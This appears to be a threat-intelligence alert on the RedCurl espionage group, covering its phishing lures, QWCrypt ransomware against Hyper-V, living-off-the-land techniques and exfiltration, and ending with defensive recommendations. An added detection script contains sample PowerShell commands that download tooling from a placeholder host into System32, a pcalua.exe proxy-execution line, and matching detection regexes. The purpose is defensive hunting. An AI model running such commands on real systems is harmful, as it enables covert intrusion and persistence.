RedCurl: The Russian-Speaking Cyber Group Expanding Its Tactics with QWCrypt Ransomware

The threat actor RedCurl, known for corporate espionage campaigns since 2018, has recently been observed deploying ransomware that specifically targets Hyper-V virtual machines. Historically, RedCurl's tradecraft has centred on social engineering: phishing emails carrying malicious attachments, followed by abuse of legitimate tools such as PowerShell to stage and execute its malware.

Threat alert
March 27, 2025


This Russian-speaking cyber group, which initially focused on stealthy corporate espionage campaigns, has targeted various industries, including finance, construction, tourism, and consulting. Their primary objective has been to exfiltrate confidential corporate documents, business emails, and sensitive data from organizations across multiple countries, notably the U.K.

In a significant shift, RedCurl has now adopted the QWCrypt ransomware. Researchers have proposed several theories to explain this change in tactics. One hypothesis suggests that the group is expanding its service offerings, while another posits that the use of ransomware could be a diversionary tactic to mislead investigators and conceal their true intentions.

Phishing activity

RedCurl initiates its attacks with carefully crafted phishing emails, often disguised as job applications or HR-related documents. The emails carry .ISO and .IMG attachments, which Windows mounts as a virtual drive when opened, and the mounted contents start a multi-stage infection chain. Rather than exploiting a software flaw, the chain relies on DLL sideloading: a legitimate, signed executable inside the image loads a malicious DLL placed alongside it, so the first stage runs under the name of a trusted binary.

QWCrypt & RedLoader

QWCrypt is a ransomware tool built to encrypt Hyper-V virtual machines. Because it works against the virtual disks at the hypervisor level, a single host compromise can take down every guest running on it. It encrypts with XChaCha20-Poly1305, a modern authenticated cipher; when such a cipher is used correctly there is no cryptographic shortcut to recovery, so restoration depends on offline backups. Its ransom notes borrow the wording of other well-known ransomware groups such as LockBit and HardBit.

RedCurl also uses a loader known as RedLoader, which layers several obfuscation techniques to hinder detection and analysis.

PowerShell & Living Off the Land

RedCurl combines legitimate administrative tools with custom malware to stay hidden and persist inside compromised networks. The group uses Sysinternals utilities and Active Directory Explorer for reconnaissance, and PowerShell scripts to disable defences before ransomware is deployed. Its operations are characterised by a long dwell time in victim networks, with cloud storage services and PowerShell scripts also serving for data exfiltration and command-and-control.

For example, one observed PowerShell command downloads a file named curl.tmp from a specified URL and saves it as curl.exe in the C:\Windows\System32\ directory. A second command does the same for 7za.tmp, saving it as 7za.exe, a copy of the 7-Zip command-line utility. Dropping renamed tooling into System32 both disguises it as a Windows component and indicates that the actor already holds local administrator rights, since writing to that directory requires elevation.

RedCurl blends in with normal activity by leveraging legitimate tools and services. The group uses PowerShell, curl and the Program Compatibility Assistant (pcalua.exe) to execute malicious commands and evade detection; pcalua.exe accepts a target via its -a switch and launches it, so the malicious process appears as a child of a signed Windows binary. For instance, scheduled tasks are created to run pcalua.exe, which in turn runs malicious binaries or Python scripts. These tasks are given names that closely resemble those of common legitimate Windows scheduled tasks to avoid suspicion.
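The three living-off-the-land patterns described in this section (renamed tooling downloaded into System32, pcalua.exe used as an execution proxy, and scheduled tasks with lookalike names) can be hunted for in endpoint telemetry. The script below is an added example written for this page, not code from Socura or from any RedCurl report. It runs over a handful of constructed Sysmon process-creation (Event ID 1) and Windows Security scheduled-task-creation (Event ID 4698) records; the records, the URLs, the short allow-list of known task names and the similarity threshold are all assumptions for illustration.

```python
"""Hunt for RedCurl-style living-off-the-land patterns in constructed
Sysmon (Event ID 1) and Windows Security (Event ID 4698) records.
All telemetry below is made up for the example; field names follow the
real event schemas, but the thresholds and allow-list are assumptions."""
import re
from difflib import SequenceMatcher

# Illustrative subset of genuine built-in task names (assumption: in practice
# export the full list from a clean reference host of the same build).
KNOWN_TASKS = {
    r"\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan",
    r"\Microsoft\Windows\UpdateOrchestrator\Schedule Scan",
    r"\Microsoft\Windows\Time Synchronization\SynchronizeTime",
}

DOWNLOAD_VERB = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|\bcurl(\.exe)?\b|start-bitstransfer",
    re.I)
SYSTEM32_DROP = re.compile(r"c:\\windows\\system32\\[\w.-]+\.(exe|dll)", re.I)
PCALUA_PROXY = re.compile(r"pcalua(\.exe)?\s+-a\s+(\S+)", re.I)

# Constructed sample events (not real logs). example.invalid is a reserved
# test domain, used here so nothing resolves if the script is run as-is.
EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell -w hidden (New-Object Net.WebClient).DownloadFile("https://example.invalid/curl.tmp","C:\Windows\System32\curl.exe")'},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell Invoke-WebRequest https://example.invalid/7za.tmp -OutFile C:\Windows\System32\7za.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\pcalua.exe",
     "CommandLine": r"pcalua.exe -a C:\ProgramData\update\python.exe C:\ProgramData\update\run.py"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell Get-ChildItem C:\Users\alice\Documents"},  # benign admin use
    {"EventID": 4698, "TaskName": r"\Microsoft\Windows\Windows Defender\Windows Defender Schedule Scan",
     "TaskContent": r"<Command>C:\ProgramData\svc\svc.exe</Command>"},  # lookalike: missing 'd'
    {"EventID": 4698, "TaskName": r"\Microsoft\Windows\Update\UpdateCheck",
     "TaskContent": r"<Command>C:\Windows\System32\pcalua.exe</Command><Arguments>-a C:\ProgramData\update\python.exe</Arguments>"},
    {"EventID": 4698, "TaskName": r"\Microsoft\Windows\UpdateOrchestrator\Schedule Scan",
     "TaskContent": r"<Command>usoclient.exe</Command>"},  # benign: exact known name
]


def rule_powershell_drop_to_system32(ev):
    """PowerShell fetching content and writing an .exe/.dll into System32,
    the curl.tmp -> curl.exe / 7za.tmp -> 7za.exe pattern."""
    if ev.get("EventID") != 1 or "powershell" not in ev["Image"].lower():
        return None
    cmd = ev["CommandLine"]
    drop = SYSTEM32_DROP.search(cmd)
    if DOWNLOAD_VERB.search(cmd) and drop:
        return "powershell_drop_to_system32", drop.group(0)
    return None


def rule_pcalua_proxy_exec(ev):
    """pcalua.exe -a <target>: Program Compatibility Assistant used to launch
    an arbitrary binary or script under a signed Windows parent."""
    if ev.get("EventID") != 1 or not ev["Image"].lower().endswith("pcalua.exe"):
        return None
    m = PCALUA_PROXY.search(ev["CommandLine"])
    return ("pcalua_proxy_exec", m.group(2)) if m else None


def rule_lookalike_task(ev):
    """New task whose action is pcalua.exe (no built-in task does that), or
    whose name is close to, but not exactly, a known Windows task name."""
    if ev.get("EventID") != 4698:
        return None
    name = ev["TaskName"]
    if "pcalua" in ev.get("TaskContent", "").lower():
        return "task_runs_pcalua", name
    if name in KNOWN_TASKS:
        return None
    best = max(KNOWN_TASKS, key=lambda k: SequenceMatcher(None, name.lower(), k.lower()).ratio())
    if SequenceMatcher(None, name.lower(), best.lower()).ratio() >= 0.9:  # threshold is an assumption
        return "lookalike_task_name", f"{name} ~ {best}"
    return None


RULES = (rule_powershell_drop_to_system32, rule_pcalua_proxy_exec, rule_lookalike_task)


def hunt(events):
    """Return (rule_name, evidence) pairs for every event that trips a rule."""
    return [hit for ev in events for rule in RULES if (hit := rule(ev))]


if __name__ == "__main__":
    for rule_name, evidence in hunt(EVENTS):
        print(f"{rule_name:30} {evidence}")
```

The lookalike check is deliberately fuzzy: a one-character difference in a task name is invisible in a long Task Scheduler listing but trivial to catch by comparing against a baseline exported from a clean host. Exact matches to known names are not flagged by name alone, which is why the pcalua.exe action check runs first; an attacker who reuses a real task name verbatim is caught by what the task does rather than what it is called.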

Data Exfiltration

Once inside a network, RedCurl focuses on stealing confidential documents and business emails. The group uses LaZagne to harvest credentials stored by browsers, mail clients and other local applications, and exfiltrates data to cloud storage services, so the outbound traffic blends with ordinary HTTPS use and is hard to attribute.

Recommendations

  • Implement advanced email filtering solutions to detect and block phishing emails containing malicious attachments such as .ISO and .IMG files.
  • Additionally, prevent automatic mounting of ISO/IMG by Group Policy.
  • Limit access to free web hosting or cloud storage resources, excluding those approved to be used within the organisation.
  • Implement strict application control policies to limit the execution of unauthorised scripts and binaries.
  • Implement network segmentation to limit lateral movement within the network. Restrict SMB and RDP access where unnecessary to prevent the spread of malware.
  • Enforce least privilege access controls and use phishing-resistant multi-factor authentication (MFA) methods like FIDO tokens or Microsoft Authenticator with passkeys to enhance account security.
  • Monitor use of built-in commands and tools that are commonly used to enumerate systems and files. Enable detailed logging for PowerShell (script block and module logging) and other scripting environments.

Here at Socura, we focus on proactive threat hunts and on creating rules to detect malicious activity and threat actors' behaviour.